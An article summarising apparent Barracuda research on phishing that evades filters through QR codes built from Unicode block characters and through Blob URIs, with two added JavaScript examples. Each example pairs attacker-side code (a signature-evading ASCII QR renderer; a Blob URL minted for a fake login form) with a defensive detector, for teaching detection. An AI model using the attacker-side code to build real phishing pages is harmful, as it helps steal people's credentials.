Clever phishing techniques: QR codes with ASCII and Blob URIs that bypass security


Learn how cybercriminals exploit QR codes.

Even the most carefully planned phishing campaigns fail if cybercriminals cannot bypass security measures.

In a blog post on the Barracuda website, Ashitosh Deshnur (Associate Threat Analyst in the Threat Analyst Team at Barracuda Networks) presents two innovative security bypass techniques recently identified by Barracuda’s threat analysts:

The first technique involves QR codes that, instead of being a static image, are built from a grid of ASCII/Unicode “full block (█)” characters laid out as text. The aim is to stop security software from recognizing the QR code as an image at all, and therefore from extracting the malicious URL it encodes.

The second technique involves the use of “Blob” (binary large object) URIs (uniform resource identifiers), which point at data the browser itself holds in memory rather than at a resource hosted on a known malicious domain. Blob URIs are created dynamically by the page’s own script and can be discarded almost immediately, which makes them hard to track and analyze. Moreover, because some security controls do not scrutinize Blob URIs as thoroughly as ordinary HTTP or HTTPS links, phishing pages served through them can slip past basic detection.

A New Generation of Malicious QR Codes

A year ago, phishing attacks using QR codes surged significantly. Barracuda data shows that approximately 1 in 20 mailboxes were targeted by QR code attacks in the last quarter of 2023.

These attacks typically used static, image-based QR codes. Attackers embedded malicious links into these codes, encouraging users to scan them, which led to fake websites designed to resemble trusted services or applications.

Security measures quickly adapted. Image-analysis tools such as Optical Character Recognition (OCR) engines were able to locate the QR code in the image, decode it, and extract, analyze, and block the malicious URL it carried.

Barracuda’s threat analysts, during testing, identified a new generation of QR code phishing designed to bypass OCR-based defenses. In these attacks, the “image” of the QR code is created using ASCII/Unicode characters.

In an email client, such a QR code looks like a traditional QR code and scans like one. To a typical OCR-based detector, however, the message contains no image at all, only a run of identical text characters, so no QR code is found and no URL is extracted.

Example 1

A phishing attack poses as a “Payroll and Benefits Registration” file, shared by an Administrator. When the unsuspecting recipient scans the QR code and clicks the link, they are redirected to a fake Microsoft login page.

A closer inspection of the QR code reveals a thin line between each block. This is because the QR code is not an image but a grid of text carefully built from the “full block” character, █ (Unicode U+2588).


The QR code is a 49×49 matrix composed of “full blocks” (█); 49 modules per side is the size of a version 8 QR symbol.

What was done to make the QR code look convincing?

Wherever a light (white) module is required, the block character is still present in the source, but an inline cascading style sheet (CSS) rule sets its color to fully transparent, so it renders as blank space while the row keeps its width. The dark modules are ordinary visible block characters, so the grid still scans correctly.


Example 2

In this case, the attacker impersonates the courier company DHL and asks the recipient to fill out a form after scanning the QR code. Upon scanning the code, the victim is unexpectedly redirected to a phishing site.

Another important point is that, in HTML, each “block” can be written in several ways: as the literal character █, as the decimal entity &#9608; or as the hexadecimal entity &#x2588;. Attackers can use single blocks or combinations of block characters, and mix these representations within one code, to generate QR codes based on ASCII/Unicode.

All of this multiplies the number of textual variants a signature would have to cover, making ASCII-based QR codes particularly difficult to detect by pattern matching alone.

Barracuda notes that if a security technology suspects an ASCII QR code is being used in a phishing attack, one of the simplest countermeasures is to render the email to an image (a screenshot) and pass that image to the OCR/QR engine, which then sees the grid as pixels rather than characters and can read the URL hidden behind the QR code.
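The following is an added example written for this page, not code from the Barracuda post or from any attacker kit. It builds a constructed 21×21 module grid (the three QR finder patterns plus a deterministic filler; it has QR geometry but encodes no data), renders it the way the two examples above describe (full blocks, light modules hidden with inline CSS, the three textual representations of U+2588 mixed in), and then shows the check a mail filter can run without taking a screenshot: fold every representation back to one character, read the rows back as a 0/1 matrix, and test the matrix for QR geometry (square, a valid module count, finder patterns in three corners). The function names and the sample grid are assumptions for illustration; the matrix it recovers is what a QR decoder would then be handed.

```javascript
// Added example (not from the Barracuda post): building an "ASCII QR code"
// from U+2588 FULL BLOCK characters and recovering the module grid from the
// HTML without OCR. Runs under Node 18+ or any modern browser.

const FULL_BLOCK = "\u2588";
// Three representations of the same character in an HTML mail body.
const BLOCK_FORMS = [FULL_BLOCK, "&#9608;", "&#x2588;"];

// 7x7 finder pattern found in three corners of every QR symbol.
const FINDER = [
  [1, 1, 1, 1, 1, 1, 1],
  [1, 0, 0, 0, 0, 0, 1],
  [1, 0, 1, 1, 1, 0, 1],
  [1, 0, 1, 1, 1, 0, 1],
  [1, 0, 1, 1, 1, 0, 1],
  [1, 0, 0, 0, 0, 0, 1],
  [1, 1, 1, 1, 1, 1, 1],
];

// Constructed QR-like grid (1 = dark, 0 = light): finder patterns plus a
// deterministic filler. It has QR geometry but encodes no data.
function buildSampleGrid(size = 21) {
  const g = Array.from({ length: size }, (_, r) =>
    Array.from({ length: size }, (_, c) => ((r * 3 + c * 7) % 5 < 2 ? 1 : 0)));
  const stamp = (r0, c0) => {
    for (let r = 0; r < 7; r++)
      for (let c = 0; c < 7; c++) g[r0 + r][c0 + c] = FINDER[r][c];
  };
  stamp(0, 0); stamp(0, size - 7); stamp(size - 7, 0);
  return g;
}

// Attacker-side rendering, as the article describes it: every module is a
// full block; light modules get an inline CSS colour of transparent so they
// render as blank space, and the entity forms are mixed to defeat signatures.
function renderAsciiQr(grid) {
  let n = 0;
  const rows = grid.map((row) => row.map((cell) => {
    const glyph = BLOCK_FORMS[n++ % BLOCK_FORMS.length];
    return cell ? glyph : `<span style="color:transparent">${glyph}</span>`;
  }).join(""));
  return `<div style="font-family:monospace;line-height:1">${rows.join("<br>")}</div>`;
}

// Defender-side: fold numeric character references back to characters so
// all three forms of U+2588 compare equal.
function decodeNumericEntities(html) {
  return html
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => String.fromCodePoint(parseInt(d, 10)));
}

// Read the block characters back as a 0/1 matrix: a block wrapped in a span
// whose colour hides it is a light module, any other block is dark.
function extractBlockGrid(html) {
  const cellRe = /<span[^>]*style="([^"]*)"[^>]*>\s*\u2588\s*<\/span>|\u2588/g;
  const hiddenRe = /color\s*:\s*(transparent|white|#fff(?:fff)?)\b/i;
  const grid = [];
  for (const row of decodeNumericEntities(html).split(/<br\s*\/?>|\n/)) {
    const cells = [];
    for (const m of row.matchAll(cellRe))
      cells.push(m[1] !== undefined && hiddenRe.test(m[1]) ? 0 : 1);
    if (cells.length) grid.push(cells);
  }
  return grid;
}

function hasFinder(grid, r0, c0) {
  for (let r = 0; r < 7; r++)
    for (let c = 0; c < 7; c++) if (grid[r0 + r][c0 + c] !== FINDER[r][c]) return false;
  return true;
}

// QR symbols are square, 21..177 modules per side in steps of 4 (49 = version 8),
// with finder patterns in three corners. A text grid meeting that test is a
// rendered QR code no matter which characters it is drawn with.
function looksLikeQr(grid) {
  const n = grid.length;
  if (n < 21 || n > 177 || (n - 17) % 4 !== 0) return false;
  if (!grid.every((row) => row.length === n)) return false;
  return hasFinder(grid, 0, 0) && hasFinder(grid, 0, n - 7) && hasFinder(grid, n - 7, 0);
}

// Usage: round-trip the constructed grid through the attacker's HTML.
const recovered = extractBlockGrid(renderAsciiQr(buildSampleGrid(21)));
console.log(`recovered ${recovered.length}x${recovered[0].length} grid; QR-like: ${looksLikeQr(recovered)}`);
```

The geometry test deliberately ignores which entity form or which block-drawing character was used: once the HTML is normalized, the detector only cares whether the text forms a square of the right size with finder patterns, which is the property the attacker cannot vary without breaking the scan. Half-block or shaded characters would need one more normalization step before the same check applies.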

The Vast Potential of Blob URI to Bypass Security Measures

Blob URIs (also known as Blob URLs or Object URLs) are used by browsers to refer to binary data or file-like objects (called Blobs) that are held temporarily in the browser’s memory. A page’s script creates one with URL.createObjectURL(); the result starts with the blob: scheme, is tied to the origin of the document that created it, and stops resolving once that document revokes it (URL.revokeObjectURL()) or is closed.

Blob URIs allow web developers to work with binary data, such as images, videos, or files, without uploading it to or downloading it from an external server.

Because a Blob URI does not fetch anything from an external server, traditional URL filtering and link-scanning tools have nothing to resolve: the blob: address names no host to look up and nothing a sandbox can fetch from outside the document that created it, so the content may initially not be recognized as malicious.

Cybercriminals create phishing pages using Blob URIs, hoping that detection systems will have a harder time identifying and blocking malicious content.

One of the first examples of a phishing attack using Blob URIs, identified by Barracuda’s threat analysts, involved impersonating Capital One, encouraging users to click “Check your account.” This redirected them to an intermediary phishing page that generated a Blob URI and quickly redirected the browser to the newly created address.

What does a Blob URI do?

It displays a fake Capital One login page to the victim.
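An added example, not code from the Barracuda post or from the phishing kit it describes, of the two halves of the Blob technique outlined above: the intermediary page’s script minting a blob: URL for an HTML Blob (here carrying a constructed stand-in for the fake login form), and a source-level check a defender can run over the intermediary page itself, since the blob: address cannot be scanned from outside the document that created it. It runs under Node 18 or later; navigation to the minted URL is browser-only and appears only in a comment. The function names and the two sample page scripts are assumptions made for illustration.

```javascript
// Added example (not from the Barracuda post or the phishing kit it describes):
// the Blob-URI half of the attack, and a source-level check for it. Node 18+.

// Constructed stand-in for the fake login page the Blob carries.
const FAKE_LOGIN_HTML = `<!doctype html><title>Sign in</title>
<form method="post" action="https://collector.invalid/submit">
  <input name="user"><input name="pass" type="password"><button>Sign in</button>
</form>`;

// Attacker-side: wrap the page in an HTML Blob and mint an object URL for it.
// In a browser the result is blob:https://<intermediary-origin>/<uuid>; it
// resolves only inside the document that created it, so no external scanner,
// reputation lookup or sandbox can fetch it. The intermediary page then runs
//   location.href = url;          (browser-only; not executed here)
function mintBlobPage(html) {
  const blob = new Blob([html], { type: "text/html" });
  return URL.createObjectURL(blob);
}

// The address dies as soon as the page revokes it, or when the tab closes.
function discardBlobPage(url) {
  URL.revokeObjectURL(url);
}

// Only the scheme can be judged from the address itself.
function isBlobUrl(url) {
  try {
    return new URL(url).protocol === "blob:";
  } catch {
    return false;
  }
}

// Defender-side heuristic over the intermediary page's source: an HTML-typed
// Blob, turned into an object URL and handed to a navigation sink. Benign uses
// of createObjectURL (image previews, downloads) lack the text/html type or
// the navigation, so they are not flagged.
function looksLikeBlobRedirect(source) {
  const htmlBlob = /new\s+Blob\s*\([^;]*?type\s*:\s*["']text\/html["']/.test(source);
  const objectUrl = /URL\.createObjectURL\s*\(/.test(source);
  const navigation =
    /\blocation\s*(\.href\s*=(?!=)|\.assign\s*\(|\.replace\s*\(|=(?!=))|window\.open\s*\(/.test(source);
  return htmlBlob && objectUrl && navigation;
}

// Constructed samples of page script, not captured from a real campaign.
const REDIRECT_SCRIPT = `
  var b = new Blob([atob(payload)], { type: "text/html" });
  location.href = URL.createObjectURL(b);
`;
const BENIGN_SCRIPT = `
  var png = new Blob([bytes], { type: "image/png" });
  img.src = URL.createObjectURL(png);
`;

// Usage: mint, inspect, discard.
const url = mintBlobPage(FAKE_LOGIN_HTML);
console.log(`minted ${url} (blob URL: ${isBlobUrl(url)}); redirect script flagged: ${looksLikeBlobRedirect(REDIRECT_SCRIPT)}`);
discardBlobPage(url);
```

The practical consequence for detection is that the link a user sees in the address bar is worthless as an indicator: the thing to capture and scan is the intermediary page that mints the Blob (its script and the encoded HTML it unpacks), and a click-time sandbox has to execute that page rather than merely resolve the final URL.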

Threat analysts, during various tests, also noticed that the Blob URI technique was used in phishing attacks impersonating Chase and Air Canada.

Summary

Phishing techniques to evade detection have evolved significantly, posing an increasing threat to organizations. Cybercriminals are constantly improving their methods to bypass traditional security measures. As phishing attacks become more sophisticated, it is essential to implement multilayered defense strategies and promote a strong security culture.

Megharaj Balaraddi, Associate Threat Analyst at Barracuda, also contributed to the research for this blog post. The original article can be found on the Barracuda Blog.